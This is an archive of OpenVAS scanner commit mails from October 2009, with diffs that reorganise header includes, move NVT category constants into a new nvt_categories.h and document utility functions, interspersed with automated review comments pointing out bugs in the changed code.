trunk/openvas-scanner/openvassd/utils.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/utils.c 2009-10-05 09:09:07 UTC (rev 5363) @@ -26,8 +26,9 @@ * * */ - + #include + #include "log.h" #include "ntp.h" #include "auth.h" 
@@ -203,32 +204,29 @@ /** - * Returns the number of plugins that will be launched + * @brief Returns the number of plugins that will be launched. */ -int -get_active_plugins_number(plugins) - struct arglist * plugins; +int +get_active_plugins_number (struct arglist * plugins) { int num = 0; - + if(plugins != NULL) while(plugins->next != NULL) { - if(plug_get_launch(plugins->value) != LAUNCH_DISABLED )num++; + if (plug_get_launch(plugins->value) != LAUNCH_DISABLED) + num++; plugins = plugins->next; } - - + return num; } -void -plugins_set_ntp_caps(plugins, caps) - struct arglist * plugins; - ntp_caps* caps; +void +plugins_set_ntp_caps (struct arglist * plugins, ntp_caps* caps) { if(!caps || !plugins)return; while(plugins->next) @@ -238,7 +236,7 @@ v = plugins->value; else v = NULL; - + if( v != NULL ){ struct ntp_caps * old = arg_get_value(v, "NTP_CAPS"); if ( old != NULL ) @@ -257,19 +255,18 @@ int -is_symlink(name) - char * name; +is_symlink (char * name) { struct stat sb; if(stat(name, &sb))return(0); return(S_ISLNK(sb.st_mode)); } -void check_symlink(name) - char * name; +void +check_symlink (char * name) { - if(is_symlink(name)) - { + if (is_symlink(name)) + { fprintf(stderr, "The file %s is a symlink -- can't continue\n", name); DO_EXIT(0); } @@ -280,9 +277,8 @@ * to a space delimited lists of hosts * in one string and returns it. */ -char * -hosts_arglist_to_string(hosts) - struct arglist * hosts; +char * +hosts_arglist_to_string (struct arglist * hosts) { int num_hosts = 0; struct arglist * start = hosts; @@ -296,12 +292,12 @@ hosts_len+=strlen(hosts->value); } hosts = hosts->next; - } - + } + ret = emalloc(hosts_len + 2 * num_hosts + 1); - + hosts = start; - + while(hosts && hosts->next) { if(hosts->value){ strcat(ret, hosts->value); @@ -310,7 +306,7 @@ hosts = hosts->next; } return(ret); -} +} /*----------------------------------------------------------------- 
@@ -318,8 +314,9 @@ -------------------------------------------------------------------*/ +/** @todo use glib functions to create the path */ void -create_pid_file() +create_pid_file () { FILE * f; char * fname = malloc(strlen(OPENVASSD_PIDDIR) + strlen("/openvassd.pid") + 1); @@ -338,8 +335,9 @@ free(fname); } +/** @todo use glib functions to create the path */ void -delete_pid_file() +delete_pid_file () { char * fname = malloc(strlen(OPENVASSD_PIDDIR) + strlen("/openvassd.pid") + 1); strcpy(fname, OPENVASSD_PIDDIR); @@ -371,7 +369,7 @@ fd = open(ret, O_RDONLY); } while (fd >= 0); - + return ret; } @@ -381,19 +379,17 @@ /** * Determines if a process is alive - as reliably as we can */ -int -process_alive(pid) - pid_t pid; +int +process_alive (pid_t pid) { - int i, ret; - if( pid == 0 ) + int i, ret; + if (pid == 0) return 0; - - for(i=0,ret=1;(i<10) && (ret > 0);i++) - ret = waitpid(pid, NULL, WNOHANG); - - - return kill(pid, 0) == 0; + + for (i = 0,ret = 1;(i < 10) && (ret > 0) ; i++) + ret = waitpid (pid, NULL, WNOHANG); + + return kill (pid, 0) == 0; } From scm-commit at wald.intevation.org Mon Oct 5 11:19:23 2009 
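Review bot: In the plugs_req.c hunk at @@ -155,24 +141,21 @@, the converted prototype of requirements_common_ports names both parameters plugin1 (`struct scheduler_plugin * plugin1, struct scheduler_plugin * plugin1`), while the body still tests `!plugin2` and reads `plugin2->required_ports`, so the function cannot compile as written. The second parameter should be plugin2. The new comment also carries two @brief tags and a dangling backslash after "Returns"; a single @brief plus a @return line describing the returned arglist would say what callers get back.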
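Review bot: The @brief added for get_closed_udp_ports in plugs_req.c (hunk @@ -37,55 +38,48 @@) repeats "Returns whether a port in a port list is closed or not", which does not describe the contract the callers rely on. get_closed_ports returns -1 for a NULL list, the port number when kb_get_port_state_proto is nonzero, and 0 when it "found nothing", and requirements_plugin turns a 0 result into "none of the required tcp ports are open". Since the comment is being rewritten anyway, add @return lines that spell out these three cases for both functions, and consider a name that matches the behaviour.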
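Review bot: In save_kb_write (save_kb.c, hunk @@ -288,85 +291,90 @@) the result of write is only tested with `if (e < 0)`, so a short write where e is smaller than strlen (str) goes unnoticed and the function still returns 0. Given the new @todo about content not reaching the file for large values, compare e with the requested length and loop or log when they differ. Smaller points in the same hunk: the new comment lists the no-duplicates family as "Successful/..." while the code tests "Success/"; `strncmp (name, "/tmp/", 4)` compares only four bytes of the five-character prefix (the other prefixes use their full length), so any key beginning with "/tmp" is skipped; and the @return text promises -1 only for a bad handle or NULL parameter, which means a failed write is reported to callers as success.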
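Review bot: While is_symlink is being touched in utils.c (hunk @@ -257,19 +255,18 @@), note that it calls `stat(name, &sb)` and then returns `S_ISLNK(sb.st_mode)`. stat follows symbolic links and reports the mode of the target, so S_ISLNK is never true here and check_symlink never reaches its "can't continue" branch. Use lstat in is_symlink so the guard actually detects a symlink.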
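Review bot: The save_tests.c hunk at @@ -454,20 +454,17 @@ only tidies comments, but the code under the rewritten "Get the first line of our file" comment needs checks. The return value of `stat(index, &st)` is ignored, the result of mmap is used without comparing it to MAP_FAILED, and the scan `while(t[length] && t[length]!='\n')length++;` is not bounded by len, so it can read past the mapping when the first len bytes contain neither a newline nor a NUL. Bound the loop with `length < len` and bail out on a failed stat or mmap before dereferencing t.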
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org)
Date: Mon, 5 Oct 2009 11:19:23 +0200 (CEST)
Subject: [Openvas-commits] r5364 - in trunk/openvas-scanner: . cnvts/find_service cnvts/openvas_tcp_scanner cnvts/synscan include openvassd
Message-ID: <20091005091923.0CAFE865F477@pyrosoma.intevation.org>

Author: felix
Date: 2009-10-05 11:19:22 +0200 (Mon, 05 Oct 2009)
New Revision: 5364

Modified:
   trunk/openvas-scanner/ChangeLog
   trunk/openvas-scanner/cnvts/find_service/find_service.c
   trunk/openvas-scanner/cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c
   trunk/openvas-scanner/cnvts/synscan/synscan.c
   trunk/openvas-scanner/include/includes.h
   trunk/openvas-scanner/openvassd/attack.c
   trunk/openvas-scanner/openvassd/openvassd.c
   trunk/openvas-scanner/openvassd/oval_plugins.c
   trunk/openvas-scanner/openvassd/piic.c
   trunk/openvas-scanner/openvassd/pluginlaunch.h
   trunk/openvas-scanner/openvassd/pluginscheduler.c
   trunk/openvas-scanner/openvassd/plugs_req.c
   trunk/openvas-scanner/openvassd/save_kb.c
   trunk/openvas-scanner/openvassd/save_tests.c
   trunk/openvas-scanner/openvassd/utils.c
Log:
Towards removal of libopenvas.h.

* openvassd/attack.c (attack_network): Removed unused variable.

* cnvts/find_service/find_service.c, cnvts/openvas_tcp_scanner.c, cnvts/synscan/synscan.c, openvassd/save_kb.c, openvassd/save_tests.c: Cleaned up/added includes.

* include/includes.h: Removed include of libopenvas.h and ntp.h.

* openvassd/openvassd.c, openvassd/oval_plugins.c, openvassd/utils.c: Added include of libopenvas.h where not yet resolved.

* openvassd/plugs_req.c: Added include. (requirements_common_ports): Corrected typo from last commit.

Modified: trunk/openvas-scanner/ChangeLog
===================================================================
--- trunk/openvas-scanner/ChangeLog 2009-10-05 09:09:07 UTC (rev 5363)
+++ trunk/openvas-scanner/ChangeLog 2009-10-05 09:19:22 UTC (rev 5364)
@@ -1,5 +1,23 @@ 2009-10-05 Felix Wolfsteller + Towards removal of libopenvas.h. + + * openvassd/attack.c + (attack_network): Removed unused variable. + + * cnvts/find_service/find_service.c, cnvts/openvas_tcp_scanner.c, + cnvts/synscan/synscan.c: Cleaned up/added includes. + + * include/includes.h: Removed include of libopenvas.h and ntp.h. + + * openvassd/openvassd.c, openvassd/oval_plugins.c, openvassd/utils.c: + Added include of libopenvas.h where not yet resolved. + + * openvassd/plugs_req.c: Added include. + (requirements_common_ports): Corrected typo from last commit. + +2009-10-05 Felix Wolfsteller + * openvassd/pluginscheduler.c, openvassd/plugs_req.c, openvassd/save_kb.c, openvassd/save_tests.c, openvassd/utils.c, openvassd/piic.c: Cosmetics, doc, todos added. Modified: trunk/openvas-scanner/cnvts/find_service/find_service.c =================================================================== --- trunk/openvas-scanner/cnvts/find_service/find_service.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/cnvts/find_service/find_service.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -9,6 +9,12 @@ #include +#include "libopenvas.h" + +#include /* for struct arglist */ +#include /* for ACT_SCANNER */ +#include /* for OPENVAS_ENCAPS_IP */ + #include #define EN_NAME "Services" Modified: trunk/openvas-scanner/cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c =================================================================== --- trunk/openvas-scanner/cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c 2009-10-05 09:19:22 UTC (rev 5364) 
@@ -19,6 +19,11 @@ #include +#include /* for struct arglist */ +#include /* for ACT_SCANNER */ +#include /* for find_in_path */ +#include /* for efree */ + #ifdef LINUX #include #include Modified: trunk/openvas-scanner/cnvts/synscan/synscan.c =================================================================== --- trunk/openvas-scanner/cnvts/synscan/synscan.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/cnvts/synscan/synscan.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -3,9 +3,15 @@ #include #include +#include /* for struct arglist */ +#include /* for bpf_open_live */ +#include /* for ACT_SCANNER */ +#include /* for get_datalink_size */ +#include /* for scanner_add_port */ +#include /* for efree */ -#undef DEBUG +#undef DEBUG #undef SHOW_RETRIES #undef SHOW_RTT_REMOVAL Modified: trunk/openvas-scanner/include/includes.h =================================================================== --- trunk/openvas-scanner/include/includes.h 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/include/includes.h 2009-10-05 09:19:22 UTC (rev 5364) @@ -273,8 +273,6 @@ #include #include -#include -#include #ifdef HAVE_SHL_LOAD /* I love HPUX (jh) */ #undef dlopen Modified: trunk/openvas-scanner/openvassd/attack.c =================================================================== --- trunk/openvas-scanner/openvassd/attack.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/attack.c 2009-10-05 09:19:22 UTC (rev 5364) 
@@ -31,27 +31,34 @@ #include #include +#include /* for kb_new */ +#include /* for auth_printf */ +#include /* for ACT_INIT */ +#include /* for is_local_ip */ +#include /* for plug_get_path */ +#include /* for setproctitle */ +#include /* for emalloc */ #include "attack.h" +#include "auth.h" +#include "comm.h" +#include "hosts.h" #include "log.h" -#include "sighand.h" -#include "rules.h" -#include "auth.h" -#include "processes.h" -#include "comm.h" -#include "utils.h" -#include "preferences.h" #include "ntp.h" #include "ntp_11.h" #include "openvas_ssh_login.h" +#include "pluginlaunch.h" #include "pluginload.h" +#include "pluginscheduler.h" +#include "plugs_req.h" +#include "preferences.h" +#include "processes.h" +#include "rules.h" #include "save_tests.h" #include "save_kb.h" +#include "sighand.h" +#include "utils.h" -#include "pluginscheduler.h" -#include "pluginlaunch.h" -#include "plugs_req.h" -#include "hosts.h" #define ERR_HOST_DEAD -1 #define ERR_CANT_FORK -2 @@ -729,7 +736,6 @@ plugins_scheduler_t sched; int fork_retries = 0; GHashTable* files; - char * key; struct timeval then, now; inaddrs_t addrs; char buffer[INET6_ADDRSTRLEN]; Modified: trunk/openvas-scanner/openvassd/openvassd.c =================================================================== --- trunk/openvas-scanner/openvassd/openvassd.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/openvassd.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -46,6 +46,8 @@ #include #include +#include "libopenvas.h" + #ifdef USE_LIBWRAP #include #include Modified: trunk/openvas-scanner/openvassd/oval_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 09:19:22 UTC (rev 5364) 
@@ -31,6 +31,8 @@ #include +#include "libopenvas.h" + #include #include Modified: trunk/openvas-scanner/openvassd/piic.c =================================================================== --- trunk/openvas-scanner/openvassd/piic.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/piic.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -30,6 +30,11 @@ #include +#include /* for kb_item_set_int */ +#include /* for internal_recv */ +#include /* for INTERNAL_COMM_MSG_TYPE_KB */ +#include /* for efree */ + #include "log.h" #include "save_kb.h" #include "utils.h" Modified: trunk/openvas-scanner/openvassd/pluginlaunch.h =================================================================== --- trunk/openvas-scanner/openvassd/pluginlaunch.h 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/pluginlaunch.h 2009-10-05 09:19:22 UTC (rev 5364) @@ -27,10 +27,12 @@ * */ - #ifndef __PLUGINLAUNCH_H__ #define __PLUGINLAUNCH_H__ +#include "pluginload.h" /* for struct pl_class_t */ +#include "pluginscheduler.h" /* for struct plugins_scheduler_t */ + void pluginlaunch_init(struct arglist * ); void pluginlaunch_wait(); void pluginlaunch_wait_for_free_process(); Modified: trunk/openvas-scanner/openvassd/pluginscheduler.c =================================================================== --- trunk/openvas-scanner/openvassd/pluginscheduler.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/pluginscheduler.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -30,6 +30,10 @@ #include +#include /* for ACT_SCANNER */ +#include /* for plug_get_required_ports */ +#include /* for emalloc */ + #include #define IN_SCHEDULER_CODE 1 Modified: trunk/openvas-scanner/openvassd/plugs_req.c =================================================================== --- trunk/openvas-scanner/openvassd/plugs_req.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/plugs_req.c 2009-10-05 09:19:22 UTC (rev 5364) 
@@ -30,6 +30,8 @@ #include +#include /* for emalloc */ + #include "pluginscheduler.h" #include "plugs_req.h" @@ -147,7 +149,7 @@ */ struct arglist * requirements_common_ports (struct scheduler_plugin * plugin1, - struct scheduler_plugin * plugin1) + struct scheduler_plugin * plugin2) { struct arglist * ret = NULL; struct arglist * req1; Modified: trunk/openvas-scanner/openvassd/save_kb.c =================================================================== --- trunk/openvas-scanner/openvassd/save_kb.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/save_kb.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -43,6 +43,11 @@ #include +#include /* for ACT_SCANNER */ +#include /* for kb_new */ +#include /* for addslashes.h */ +#include /* for estrdup */ + #include "log.h" #include "comm.h" #include "users.h" Modified: trunk/openvas-scanner/openvassd/save_tests.c =================================================================== --- trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -29,6 +29,8 @@ #include +#include /* for emalloc */ + #include #include "log.h" Modified: trunk/openvas-scanner/openvassd/utils.c =================================================================== --- trunk/openvas-scanner/openvassd/utils.c 2009-10-05 09:09:07 UTC (rev 5363) +++ trunk/openvas-scanner/openvassd/utils.c 2009-10-05 09:19:22 UTC (rev 5364) @@ -29,6 +29,8 @@ #include +#include "libopenvas.h" + #include "log.h" #include "ntp.h" #include "auth.h" From scm-commit at wald.intevation.org Mon Oct 5 11:25:54 2009 
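Review bot: The ChangeLog hunk of r5364 (@@ -1,5 +1,23 @@) does not cover the files this revision modifies. Its "Cleaned up/added includes" item stops at cnvts/synscan/synscan.c, while the commit log also names openvassd/save_kb.c and openvassd/save_tests.c, and the diff further changes openvassd/piic.c, openvassd/pluginlaunch.h and openvassd/pluginscheduler.c with no entry at all. The attack.c item mentions only the removed variable although that hunk also adds and reorders includes, and the entry gives cnvts/openvas_tcp_scanner.c where the modified path is cnvts/openvas_tcp_scanner/openvas_tcp_scanner.c. Bring the ChangeLog text in line with the commit log and the file list.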
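Review bot: The find_service.c hunk of r5364 (@@ -9,6 +9,12 @@) adds `#include "libopenvas.h"` together with the narrower includes annotated "for struct arglist", "for ACT_SCANNER" and "for OPENVAS_ENCAPS_IP", yet the ChangeLog names only openvassd/openvassd.c, openvassd/oval_plugins.c and openvassd/utils.c as files that gain libopenvas.h. For a change titled "Towards removal of libopenvas.h", either drop the umbrella include here if the three specific headers are enough, or add find_service.c to that ChangeLog item with a comment on what is still unresolved.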
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org)
Date: Mon, 5 Oct 2009 11:25:54 +0200 (CEST)
Subject: [Openvas-commits] r5365 - in trunk/openvas-libraries: . include nasl
Message-ID: <20091005092554.32D50861EAAC@pyrosoma.intevation.org>

Author: felix
Date: 2009-10-05 11:25:52 +0200 (Mon, 05 Oct 2009)
New Revision: 5365

Added:
   trunk/openvas-libraries/include/nvt_categories.h
Modified:
   trunk/openvas-libraries/ChangeLog
   trunk/openvas-libraries/Makefile
   trunk/openvas-libraries/include/libopenvas.h
   trunk/openvas-libraries/nasl/nasl_init.c
Log:
* includes/nvt_categories.h: New file, contains categories previously declared in libopenvas.h and a todo.

* Makefile: Install nvt_categories.h

* include/libopenvas.h: Removed definitions now contained in nvti_categories (ACT_*) and in openvas-scanner/pluginscheduler.h (LAUNCH_*).

* nasl/nasl_init.c: Include nvt_categories instead of libopenvas.

Modified: trunk/openvas-libraries/ChangeLog
===================================================================
--- trunk/openvas-libraries/ChangeLog 2009-10-05 09:19:22 UTC (rev 5364)
+++ trunk/openvas-libraries/ChangeLog 2009-10-05 09:25:52 UTC (rev 5365)
@@ -54,6 +54,7 @@ cd omp && ${MAKE} install $(INSTALL) -m 0444 include/libopenvas.h $(DESTDIR)${includedir}/openvas + $(INSTALL) -m 0444 include/nvt_categories.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 include/libvers.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 misc/arglists.h $(DESTDIR)${includedir}/openvas $(INSTALL) -m 0444 misc/bpf_share.h $(DESTDIR)${includedir}/openvas Modified: trunk/openvas-libraries/include/libopenvas.h =================================================================== --- trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:19:22 UTC (rev 5364) +++ trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:25:52 UTC (rev 5365) @@ -110,32 +110,4 @@ */ #include -/** - * 'Categories', influence execution order of NVTs. - */ - -/** Last plugins actions type. */ -#define ACT_LAST ACT_END -/** First plugins actions type. */ -#define ACT_FIRST ACT_INIT - -#define ACT_END 10 -#define ACT_FLOOD 9 -#define ACT_KILL_HOST 8 -#define ACT_DENIAL 7 -#define ACT_DESTRUCTIVE_ATTACK 6 -#define ACT_MIXED_ATTACK 5 -#define ACT_ATTACK 4 -#define ACT_GATHER_INFO 3 -#define ACT_SETTINGS 2 -#define ACT_SCANNER 1 -#define ACT_INIT 0 - -/** - * States of scheduler_plugin. - */ -#define LAUNCH_DISABLED 0 -#define LAUNCH_RUN 1 -#define LAUNCH_SILENT 2 - #endif /* _LIBOPENVAS_H */ Added: trunk/openvas-libraries/include/nvt_categories.h =================================================================== --- trunk/openvas-libraries/include/nvt_categories.h 2009-10-05 09:19:22 UTC (rev 5364) +++ trunk/openvas-libraries/include/nvt_categories.h 2009-10-05 09:25:52 UTC (rev 5365) 
@@ -0,0 +1,59 @@ +/* OpenVAS + * $Id$ + * Description: Category (ACT_*) definitions. + * + * Authors: + * Renaud Deraison (Original pre-fork development) + * + * Copyright: + * Based on work Copyright (C) 1998 - 2007 Tenable Network Security, Inc. + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Library General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Library General Public License for more details. + * + * You should have received a copy of the GNU Library General Public + * License along with this library; if not, write to the Free + * Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. + */ + +/** + * @file + * This file contains defines for the categories of NVTs. + * Categories influence the execution order of NVTs (e.g. NVTs with category + * ACT_SCANNER are in principle executed first). + */ + +#ifndef _NVT_CATEGORIES_H +#define _NVT_CATEGORIES_H + +/** + * @brief NVT 'Categories', influence execution order of NVTs. + * + * @todo Consider creation of an enumeration. + */ + +/** Last plugins actions type. */ +#define ACT_LAST ACT_END +/** First plugins actions type. 
*/ +#define ACT_FIRST ACT_INIT + +#define ACT_END 10 +#define ACT_FLOOD 9 +#define ACT_KILL_HOST 8 +#define ACT_DENIAL 7 +#define ACT_DESTRUCTIVE_ATTACK 6 +#define ACT_MIXED_ATTACK 5 +#define ACT_ATTACK 4 +#define ACT_GATHER_INFO 3 +#define ACT_SETTINGS 2 +#define ACT_SCANNER 1 +#define ACT_INIT 0 + +#endif /* _NVT_CATEGORIES_H */ Modified: trunk/openvas-libraries/nasl/nasl_init.c =================================================================== --- trunk/openvas-libraries/nasl/nasl_init.c 2009-10-05 09:19:22 UTC (rev 5364) +++ trunk/openvas-libraries/nasl/nasl_init.c 2009-10-05 09:25:52 UTC (rev 5365) @@ -20,7 +20,7 @@ #include /* for memset */ -#include "libopenvas.h" /* for ACT_INIT */ +#include "nvt_categories.h" /* for ACT_INIT */ #include "plugutils.h" /* for OPENVAS_ENCAPS_IP */ #include "nasl_tcp.h" From scm-commit at wald.intevation.org Mon Oct 5 11:29:31 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:29:31 +0200 (CEST) Subject: [Openvas-commits] r5366 - in trunk/openvas-scanner: . openvassd Message-ID: <20091005092931.EF731861EAAC@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:29:31 +0200 (Mon, 05 Oct 2009) New Revision: 5366 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/openvassd/oval_plugins.c trunk/openvas-scanner/openvassd/plugs_hash.c Log: * openvassd/plugs_hash.c, openvassd/oval_plugins.c: Added includes. * ChangeLog: Corrected. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-05 09:25:52 UTC (rev 5365) +++ trunk/openvas-scanner/ChangeLog 2009-10-05 09:29:31 UTC (rev 5366) 
@@ -1,12 +1,19 @@ 2009-10-05 Felix Wolfsteller + * openvassd/plugs_hash.c, openvassd/oval_plugins.c: Added includes. + + * ChangeLog: Corrected. + +2009-10-05 Felix Wolfsteller + Towards removal of libopenvas.h. * openvassd/attack.c (attack_network): Removed unused variable. * cnvts/find_service/find_service.c, cnvts/openvas_tcp_scanner.c, - cnvts/synscan/synscan.c: Cleaned up/added includes. + cnvts/synscan/synscan.c, openvassd/save_kb.c, openvassd/save_tests.c: + Cleaned up/added includes. * include/includes.h: Removed include of libopenvas.h and ntp.h. Modified: trunk/openvas-scanner/openvassd/oval_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 09:25:52 UTC (rev 5365) +++ trunk/openvas-scanner/openvassd/oval_plugins.c 2009-10-05 09:29:31 UTC (rev 5366) @@ -33,6 +33,7 @@ #include "libopenvas.h" +#include /* for ACT_END */ #include #include Modified: trunk/openvas-scanner/openvassd/plugs_hash.c =================================================================== --- trunk/openvas-scanner/openvassd/plugs_hash.c 2009-10-05 09:25:52 UTC (rev 5365) +++ trunk/openvas-scanner/openvassd/plugs_hash.c 2009-10-05 09:29:31 UTC (rev 5366) @@ -31,6 +31,7 @@ #include #include /* for auth_printf */ +#include /* for plug_get_path */ #include /* for send_fd */ #include /* for efree */ From scm-commit at wald.intevation.org Mon Oct 5 11:38:34 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:38:34 +0200 (CEST) Subject: [Openvas-commits] r5367 - in trunk/openvas-libraries: . include Message-ID: <20091005093834.8F70A865F49C@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:38:33 +0200 (Mon, 05 Oct 2009) New Revision: 5367 Modified: trunk/openvas-libraries/MANIFEST trunk/openvas-libraries/include/libopenvas.h Log: * include/libopenvas.h: Removed not needed function declarations and includes. * MANIFEST: Updated. Modified: trunk/openvas-libraries/MANIFEST =================================================================== --- trunk/openvas-libraries/MANIFEST 2009-10-05 09:29:31 UTC (rev 5366) +++ trunk/openvas-libraries/MANIFEST 2009-10-05 09:38:33 UTC (rev 5367) @@ -49,6 +49,7 @@ include/includes.h include/libopenvas.h include/libvers.h.in +include/nvt_categories.h INSTALL_README install-sh libopenvas.pc.in Modified: trunk/openvas-libraries/include/libopenvas.h =================================================================== --- trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:29:31 UTC (rev 5366) +++ trunk/openvas-libraries/include/libopenvas.h 2009-10-05 09:38:33 UTC (rev 5367) 
@@ -69,34 +69,7 @@ */ typedef int(*plugin_run_t)(struct arglist *); -/* - * Network-related functions - */ -/* Plugin specific network functions */ - -int ping_host(struct in_addr); - - -void plug_set_see_also(struct arglist *, char *); -struct arglist * plug_get_see_also(struct arglist *); - - -void plug_add_dep(struct arglist *, char *, char *); - -void plug_add_port(struct arglist *, int); - -/* returns a full duplex data file stream */ -FILE * ptyexecvp (const char *file, const char **argv, pid_t *child); - -void (*pty_logger(void(*)(const char *, ...)))(const char *, ...); - -/* - * Miscellaneous functions - */ - -char * plug_get_host_name(struct arglist *); - /* Plugin preference types (influence gui in client) */ #define PREF_CHECKBOX "checkbox" #define PREF_ENTRY "entry" @@ -105,9 +78,4 @@ #define PREF_FILE "file" /*#define PREF_SSH_CREDENTIALS "sshcredentials"*/ -/* - * Pcap utils - */ -#include - #endif /* _LIBOPENVAS_H */ From scm-commit at wald.intevation.org Mon Oct 5 11:45:25 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 11:45:25 +0200 (CEST) Subject: [Openvas-commits] r5368 - in trunk/openvas-scanner: . cnvts/synscan openvassd Message-ID: <20091005094525.AF6AA865F49C@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 11:45:25 +0200 (Mon, 05 Oct 2009) New Revision: 5368 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/cnvts/synscan/synscan.c trunk/openvas-scanner/openvassd/nasl_plugins.c trunk/openvas-scanner/openvassd/save_tests.c Log: * cnvts/synscan/synscan.c, openvassd/save_tests.c, openvassd/nasl_plugins.c: Added missing includes. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-05 09:38:33 UTC (rev 5367) +++ trunk/openvas-scanner/ChangeLog 2009-10-05 09:45:25 UTC (rev 5368) 
@@ -1,5 +1,10 @@ 2009-10-05 Felix Wolfsteller + * cnvts/synscan/synscan.c, openvassd/save_tests.c, + openvassd/nasl_plugins.c: Added missing includes. + +2009-10-05 Felix Wolfsteller + * openvassd/plugs_hash.c, openvassd/oval_plugins.c: Added includes. * ChangeLog: Corrected. Modified: trunk/openvas-scanner/cnvts/synscan/synscan.c =================================================================== --- trunk/openvas-scanner/cnvts/synscan/synscan.c 2009-10-05 09:38:33 UTC (rev 5367) +++ trunk/openvas-scanner/cnvts/synscan/synscan.c 2009-10-05 09:45:25 UTC (rev 5368) @@ -8,6 +8,7 @@ #include /* for ACT_SCANNER */ #include /* for get_datalink_size */ #include /* for scanner_add_port */ +#include /* for getpts */ #include /* for efree */ Modified: trunk/openvas-scanner/openvassd/nasl_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/nasl_plugins.c 2009-10-05 09:38:33 UTC (rev 5367) +++ trunk/openvas-scanner/openvassd/nasl_plugins.c 2009-10-05 09:45:25 UTC (rev 5368) @@ -45,6 +45,7 @@ #include "plugs_hash.h" #include "preferences.h" #include "processes.h" +#include "proctitle.h" /* for setproctitle */ #include "log.h" /** Modified: trunk/openvas-scanner/openvassd/save_tests.c =================================================================== --- trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:38:33 UTC (rev 5367) +++ trunk/openvas-scanner/openvassd/save_tests.c 2009-10-05 09:45:25 UTC (rev 5368) @@ -29,6 +29,7 @@ #include +#include /* for auth_printf */ #include /* for emalloc */ #include From scm-commit at wald.intevation.org Mon Oct 5 12:23:52 2009 
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 12:23:52 +0200 (CEST) Subject: [Openvas-commits] r5369 - in trunk/openvas-libraries: . include Message-ID: <20091005102352.574A5865F477@pyrosoma.intevation.org> Author: felix Date: 2009-10-05 12:23:51 +0200 (Mon, 05 Oct 2009) New Revision: 5369 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/Makefile trunk/openvas-libraries/include/libopenvas.h Log: * include/libopenvas.h: Emptied, except for documentation. * Makefile: Do not install libopenvas.h anymore. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-05 09:45:25 UTC (rev 5368) +++ trunk/openvas-libraries/ChangeLog 2009-10-05 10:23:51 UTC (rev 5369) @@ -1,5 +1,18 @@ 2009-10-05 Felix Wolfsteller + * include/libopenvas.h: Emptied, except for documentation. + + * Makefile: Do not install libopenvas.h anymore. + +2009-10-05 Felix Wolfsteller + + * include/libopenvas.h: Removed not needed function declarations and + includes. + + * MANIFEST: Updated. + +2009-10-05 Felix Wolfsteller + * includes/nvt_categories.h: New file, contains categories previously declared in libopenvas.h and a todo. Modified: trunk/openvas-libraries/Makefile =================================================================== --- trunk/openvas-libraries/Makefile 2009-10-05 09:45:25 UTC (rev 5368) +++ trunk/openvas-libraries/Makefile 2009-10-05 10:23:51 UTC (rev 5369) 
